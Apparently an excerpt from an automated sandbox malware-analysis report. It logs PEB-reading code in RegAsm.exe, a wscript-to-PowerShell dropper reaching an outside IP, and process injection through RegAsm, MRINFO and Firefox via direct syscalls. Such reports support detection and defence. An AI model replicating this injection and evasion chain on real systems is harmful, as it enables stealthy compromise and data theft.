                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27152 mov eax, dword ptr fs:[00000030h]5_2_02B27152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB8158 mov eax, dword ptr fs:[00000030h]5_2_02BB8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B26154 mov eax, dword ptr fs:[00000030h]5_2_02B26154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B26154 mov eax, dword ptr fs:[00000030h]5_2_02B26154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1C156 mov eax, dword ptr fs:[00000030h]5_2_02B1C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5152 mov eax, dword ptr fs:[00000030h]5_2_02BF5152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19148 mov eax, dword ptr fs:[00000030h]5_2_02B19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19148 mov eax, dword ptr fs:[00000030h]5_2_02B19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19148 mov eax, dword ptr fs:[00000030h]5_2_02B19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19148 mov eax, dword ptr fs:[00000030h]5_2_02B19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov eax, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov eax, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov ecx, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov eax, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov eax, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B176B2 mov eax, dword ptr fs:[00000030h]5_2_02B176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B176B2 mov eax, dword ptr fs:[00000030h]5_2_02B176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B176B2 mov eax, dword ptr fs:[00000030h]5_2_02B176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B566B0 mov eax, dword ptr fs:[00000030h]5_2_02B566B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5C6A6 mov eax, dword ptr fs:[00000030h]5_2_02B5C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D6AA mov eax, dword ptr fs:[00000030h]5_2_02B1D6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D6AA mov eax, dword ptr fs:[00000030h]5_2_02B1D6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24690 mov eax, dword ptr fs:[00000030h]5_2_02B24690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24690 mov eax, dword ptr fs:[00000030h]5_2_02B24690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA368C mov eax, dword ptr fs:[00000030h]5_2_02BA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA368C mov eax, dword ptr fs:[00000030h]5_2_02BA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA368C mov eax, dword ptr fs:[00000030h]5_2_02BA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA368C mov eax, dword ptr fs:[00000030h]5_2_02BA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E6F2 mov eax, dword ptr fs:[00000030h]5_2_02B9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E6F2 mov eax, dword ptr fs:[00000030h]5_2_02B9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E6F2 mov eax, dword ptr fs:[00000030h]5_2_02B9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E6F2 mov eax, dword ptr fs:[00000030h]5_2_02B9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA06F1 mov eax, dword ptr fs:[00000030h]5_2_02BA06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA06F1 mov eax, dword ptr fs:[00000030h]5_2_02BA06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDD6F0 mov eax, dword ptr fs:[00000030h]5_2_02BDD6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D6E0 mov eax, dword ptr fs:[00000030h]5_2_02B4D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D6E0 mov eax, dword ptr fs:[00000030h]5_2_02B4D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2B6C0 mov eax, dword ptr fs:[00000030h]5_2_02B2B6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A6C7 mov ebx, dword ptr fs:[00000030h]5_2_02B5A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A6C7 mov eax, dword ptr fs:[00000030h]5_2_02B5A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC mov eax, dword ptr fs:[00000030h]5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC mov eax, dword ptr fs:[00000030h]5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC mov eax, dword ptr fs:[00000030h]5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC mov eax, dword ptr fs:[00000030h]5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF6C7 mov eax, dword ptr fs:[00000030h]5_2_02BDF6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B516CF mov eax, dword ptr fs:[00000030h]5_2_02B516CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5636 mov eax, dword ptr fs:[00000030h]5_2_02BF5636
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E627 mov eax, dword ptr fs:[00000030h]5_2_02B3E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B56620 mov eax, dword ptr fs:[00000030h]5_2_02B56620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B58620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B1F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B2262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B23616 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B9E609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B51607 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B5F603 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B3260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B52674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE866E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B5A660 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B59660 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B3C640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B4D7B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BF37B6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B1F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BA97A9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BAF7AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B207AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BDF78A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B247FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B2D7E0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B427ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B2C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B257C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BA07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B19730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B55734 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BFB73C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B2973A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B5273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B5273C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B9C730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B23720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B3F720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BDF72E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B5C720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE972B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B20710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B50710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B5F71F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B25702 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B27703 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B5C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B28770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B30770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B1B765 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\System32\wscript.exe | Network Connect: 196.251.92.64 80
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe protection: execute and read and write
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Section loaded: NULL target: C:\Windows\SysWOW64\MRINFO.EXE protection: execute and read and write
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Section loaded: NULL target: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe protection: read write
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Section loaded: NULL target: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Thread register set: target process: 3568
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Thread APC queued: target process: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BDF008
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Process created: C:\Windows\SysWOW64\MRINFO.EXE "C:\Windows\SysWOW64\MRINFO.EXE"
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
